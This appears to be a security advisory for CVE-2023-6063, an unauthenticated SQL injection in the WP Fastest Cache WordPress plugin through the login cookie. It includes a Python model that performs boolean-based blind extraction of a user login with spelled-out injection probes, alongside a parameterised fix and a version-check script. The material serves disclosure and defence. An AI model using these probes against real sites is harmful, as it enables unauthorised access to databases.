PT-2023-6888 · WordPress · Wp Fastest Cache

Alex Sanford · Published 2023-11-13 · Updated 2024-01-14 · CVE-2023-6063

CVSS v2.0: 10 (High)

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: WP Fastest Cache versions prior to 1.2.2
Description: The WP Fastest Cache WordPress plugin does not sanitise or escape a request-supplied value before using it in a SQL statement. The value is read from the wordpress_logged_in Cookie header, which any unauthenticated client can set, so the flaw is an unauthenticated SQL injection that lets an attacker execute arbitrary SQL queries against the site's database. The vulnerability affects over 1 million sites.
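The following is an illustrative model of the injection pattern the description names. It is added here and is not code from the plugin or the advisory: the table layout (`wp_users` with `ID` and `user_login`), the query text, the cookie name suffix and the helper names are assumptions, while the `user_login|expiration|token|hmac` layout of a WordPress auth cookie is the standard one. It goes a step beyond the description by driving a boolean-based blind extraction through the concatenated sink, to show what "arbitrary SQL" buys an anonymous client, and runs the same probes against a parameterised version where nothing leaks.

```python
"""Model of the CVE-2023-6063 sink: a login name lifted from the
wordpress_logged_in cookie of an anonymous request is spliced into a query.
Added example; schema, query text and cookie suffix are assumptions."""
import sqlite3
from typing import Callable, Optional
from urllib.parse import unquote


def build_db() -> sqlite3.Connection:
    """Constructed sample users table; not data from any real site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", [(1, "admin"), (2, "editor")])
    conn.commit()
    return conn


def username_from_cookie_header(cookie_header: str) -> Optional[str]:
    """Return the user_login field of the first wordpress_logged_in_* cookie.

    Values are percent-decoded the way PHP fills $_COOKIE, and a WordPress
    auth cookie is 'user_login|expiration|token|hmac', so the text before the
    first '|' is taken as the login name. Nothing is validated: an anonymous
    client controls every byte of it. The plugin's own parsing is not
    reproduced here (assumption: it yields the same field)."""
    for pair in cookie_header.split(";"):
        name, _, value = pair.strip().partition("=")
        if name.startswith("wordpress_logged_in"):
            return unquote(value).split("|", 1)[0]
    return None


Lookup = Callable[[sqlite3.Connection, str], Optional[int]]


def user_id_vulnerable(conn: sqlite3.Connection, username: str) -> Optional[int]:
    """Concatenation: the cookie text becomes part of the SQL grammar."""
    sql = "SELECT ID FROM wp_users WHERE user_login = '" + username + "' LIMIT 1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def user_id_fixed(conn: sqlite3.Connection, username: str) -> Optional[int]:
    """Parameter binding: the cookie text is only ever a string value."""
    sql = "SELECT ID FROM wp_users WHERE user_login = ? LIMIT 1"
    row = conn.execute(sql, (username,)).fetchone()
    return row[0] if row else None


def request_matches_user(conn: sqlite3.Connection, lookup: Lookup, injected: str) -> bool:
    """Does an anonymous request whose cookie carries `injected` as the login
    field make the lookup return a user row? The cookie suffix and the other
    fields are made up; only the first field reaches the sink."""
    cookie = "wordpress_logged_in_abc123=" + injected + "|9999999999|tok|hmac"
    username = username_from_cookie_header(cookie)
    return username is not None and lookup(conn, username) is not None


def leak_login_of_user_1(conn: sqlite3.Connection, lookup: Lookup, max_len: int = 8) -> str:
    """Boolean-based blind extraction of the user_login with ID=1, one
    character per probe, using row/no-row as the oracle. Against the fixed
    lookup every probe is just an unknown username and nothing leaks."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_-"
    leaked = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            # The closing quote comes from the query text itself, so no
            # comment sequence is needed to terminate the statement.
            probe = (f"nobody' OR substr((SELECT user_login FROM wp_users WHERE ID=1),"
                     f"{pos},1)='{ch}")
            if request_matches_user(conn, lookup, probe):
                hit = ch
                break
        if hit is None:
            break
        leaked += hit
    return leaked


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", leak_login_of_user_1(db, user_id_vulnerable))  # admin
    print("fixed:     ", repr(leak_login_of_user_1(db, user_id_fixed)))  # ''
```

The extraction needs no authentication and no error messages: each probe is an ordinary request with a forged cookie, and the only signal is whether the site behaves as though a user matched. That is why the CVSS vector carries Au:N with full confidentiality impact.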
Recommendations: For versions prior to 1.2.2, update to version 1.2.2 or later. If the update cannot be applied immediately, reduce the blast radius by restricting the privileges of the database account WordPress uses; this limits what an injected query can read or change, but it does not prevent the injection itself, since the query runs over the plugin's own database connection. The injected value arrives in the wordpress_logged_in Cookie header of the request to the affected endpoint, so requests carrying unexpected content in that cookie can be dropped at a WAF or reverse proxy until the fix is in place.
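A check for the first recommendation, added here and not part of the advisory or the plugin: it reads the `Version:` field from a WordPress plugin header and compares it numerically against 1.2.2, so that a release such as 1.2.10 is not misread as older than 1.2.2 the way a string comparison would. The sample headers are constructed; the path of the plugin's main file and the WP-CLI slug mentioned below are assumptions.

```python
"""Is an installed WP Fastest Cache below the fixed version 1.2.2?
Added example; the sample plugin headers are constructed."""
import re
from typing import Optional, Tuple

FIXED_VERSION = "1.2.2"  # first release that resolves the issue (from the advisory)


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.2.10' -> (1, 2, 10). Tuples of ints order 1.2.10 after 1.2.2; a
    plain string comparison would put it before. A non-numeric piece such as
    the 'beta' in '1.2.2beta' ends the tuple."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def plugin_header_version(file_text: str) -> Optional[str]:
    """Pull the 'Version:' field out of a WordPress plugin header comment."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*\S*)", file_text, re.MULTILINE)
    return m.group(1) if m else None


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly below the fixed one."""
    return parse_version(installed) < parse_version(fixed)


def audit_plugin_file(file_text: str) -> Tuple[Optional[str], Optional[bool]]:
    """(version, vulnerable) for the contents of the main plugin file;
    (None, None) when no header is found, so an unparseable file is never
    reported as safe."""
    version = plugin_header_version(file_text)
    if version is None:
        return None, None
    return version, is_vulnerable(version)


# Constructed sample headers in the WordPress plugin-header format. On a site
# the real file lives under wp-content/plugins/wp-fastest-cache/ (assumed path).
SAMPLE_OLD = "<?php\n/*\nPlugin Name: WP Fastest Cache\nVersion: 1.2.1\n*/\n"
SAMPLE_NEW = "<?php\n/*\nPlugin Name: WP Fastest Cache\nVersion: 1.2.10\n*/\n"

if __name__ == "__main__":
    print(audit_plugin_file(SAMPLE_OLD))  # ('1.2.1', True)
    print(audit_plugin_file(SAMPLE_NEW))  # ('1.2.10', False)
```

On a live install, pass the contents of the plugin's main PHP file to `audit_plugin_file`; where WP-CLI is available, `wp plugin get wp-fastest-cache --field=version` (slug assumed) yields the same figure for comparison with `is_vulnerable`.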

Exploit

Fix

Weakness Enumeration: SQL injection

Related Identifiers: BDU:2023-07903, CVE-2023-6063

Affected Products: Wp Fastest Cache